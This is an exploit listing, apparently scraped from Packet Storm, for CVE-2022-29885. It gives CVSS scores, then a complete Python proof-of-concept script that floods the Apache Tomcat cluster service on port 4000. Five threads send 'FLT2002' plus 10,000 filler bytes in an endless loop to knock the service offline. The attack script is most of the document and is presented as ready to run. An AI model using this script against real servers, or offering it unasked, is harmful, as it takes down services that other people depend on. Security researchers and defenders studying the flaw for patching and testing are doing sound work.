Apache Tomcat 10.1 Denial Of Service

2023-04-0600:00:00

Cristian Giustini

packetstormsecurity.com

221

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

JSON

`# Exploit Title: Apache Tomcat 10.1 - Denial Of Service  
# Google Dork: N/A  
# Date: 13/07/2022  
# Exploit Author: Cristian 'void' Giustini  
# Vendor Homepage: https://tomcat.apache.org/  
# Software Link: https://tomcat.apache.org/download-10.cgi  
# Version: <= 10.1  
# Tested on: Apache Tomcat 10.0 (Docker)  
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)  
# Exploit pre-requirements: pip install pwntools==4.8.0  
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/   
  
  
  
  
  
#!/usr/bin/env python3  
  
# coding: utf-8  
  
from pwn import *  
  
import time  
  
import threading  
  
import subprocess  
  
threads = []  
  
  
  
  
  
def send_payload():  
  
r = remote("localhost", 4000)  
  
while True:  
  
r.send(b"FLT2002" + b"A" * 10000)  
  
  
  
for _ in range(5):  
  
new_thread = threading.Thread(target=send_payload)  
  
threads.append(new_thread)  
  
new_thread.start()  
  
for old_thread in threads:  
  
old_thread.join()  
  
  
`